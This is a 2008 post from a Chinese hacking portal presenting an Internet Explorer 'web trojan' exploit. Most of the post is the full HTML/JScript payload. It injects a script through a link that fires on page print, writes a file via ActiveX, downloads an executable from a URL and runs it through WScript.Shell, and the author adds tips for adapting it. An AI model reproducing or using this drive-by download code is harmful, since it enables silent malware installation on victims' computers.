| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
免费服务 我要发布 在线破解 黑客游戏 精华收集 免费空间 网络硬盘 独家报道 黑器点播 免费 FTP 交换资源
收费服务 黑客培训 光盘刻录 黑客书籍 视频下载 主力频道 空间域名 网站建设 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> 编程 >> 其它编程 >> 正文 用户登录 新用户注册
IE0DAY网马         ★★★ 【字体:
IE0DAY网马
作者:佚名 文章来源:本站原创 点击数: 更新时间:2008-7-6

  这个漏洞参考http://www.milw0rm.com/exploits/5619

  Author: Greysign

  2008-5-24

  http://www.scanw.com/blog

  哈哈。标题吸引吗。

  修改代码请注意不能使用双引号”,注意不能跨域,还有一些其他零碎的问题自己调试吧。

  这个漏洞执行后可以远程下载任意文件并执行。

  第一次写网马,只好拿鸡PP搓成鸡胸,这样垃圾的漏洞才能放出来~哈哈。

  不过。这个漏洞利用的好也可以玩一玩的。

  XML/HTML代码

Code:

<html>  
<body>  
Print me with table of links to execute    
<a href="http://www.bla.com?x=b<script defer >  
var    ForWriting    =    2;    
var    strFile    =    'c:\\test2.js';    
var    objFSO    =    new    ActiveXObject('Scripting.FileSystemObject');    
var    objStream    =    objFSO.OpenTextFile(strFile,ForWriting,true,false);    
objStream.WriteLine('var objArgs = \'http://127.0.0.1/test.exe\';');    
objStream.WriteLine('var objargss =\'c:\\\\gtest.exe\';');    
objStream.WriteLine('var sGet=new ActiveXObject(\'ADODB.Stream\');');    
objStream.WriteLine('var xGet = false;');    
objStream.WriteLine('try {');    
objStream.WriteLine('xGet = new XMLHttpRequest();');    
objStream.WriteLine('} ');    
objStream.WriteLine('catch (trymicrosoft) {');    
objStream.WriteLine('try {');    
objStream.WriteLine('     xGet = new ActiveXObject(\'Msxml2.XMLHTTP\');');    
objStream.WriteLine('} ');    
objStream.WriteLine('catch (othermicrosoft) {');    
objStream.WriteLine('     try {');    
objStream.WriteLine('       xGet = new ActiveXObject(\'Microsoft.XMLHTTP\');');    
objStream.WriteLine('     } ');    
objStream.WriteLine('catch (failed) {');    
objStream.WriteLine('       xGet = false;');    
objStream.WriteLine('     }');    
objStream.WriteLine('}');    
objStream.WriteLine('}');    
objStream.WriteLine('xGet.Open (\'GET\',objArgs.toLowerCase(),0);');    
objStream.WriteLine('xGet.Send();');    
objStream.WriteLine('sGet.Mode=3;');    
objStream.WriteLine('sGet.Type=1;');    
objStream.WriteLine('sGet.Open();');    
objStream.WriteLine('sGet.Write (xGet.ResponseBody);');    
objStream.WriteLine('sGet.SaveToFile (objargss.toLowerCase(),2);');    
objStream.WriteLine('var x=new ActiveXObject(\'WScript.Shell\');');    
objStream.WriteLine('x.Run(objargss);');    
objStream.Close();    
var    objShell    =    new    ActiveXObject('wscript.shell');    
objShell.Run(strFile);    
</script>a.c<u>o</u>m"></a>  
<script>window.print();</script>  
</body>  
</html>

责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇编程:

  • 下一篇编程:
  • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    * 游客填写  ·注册用户
    主 页:
    评 分:
    1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
  • 最新hack更新
    最新推荐资讯
    相关编程
    注入代码到IE进行下载
    网马漏洞CLSID大全
    利用Delphi编写IE扩展
    IE最新的欺骗代码
    利用Delphi编写IE扩展
    绝对调用IE浏览器的弹窗
    利用VB实现对IE的调用与控制
    VC编程改造IE浏览
    插入自己到IE进程
    一个IE补丁的源代码
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号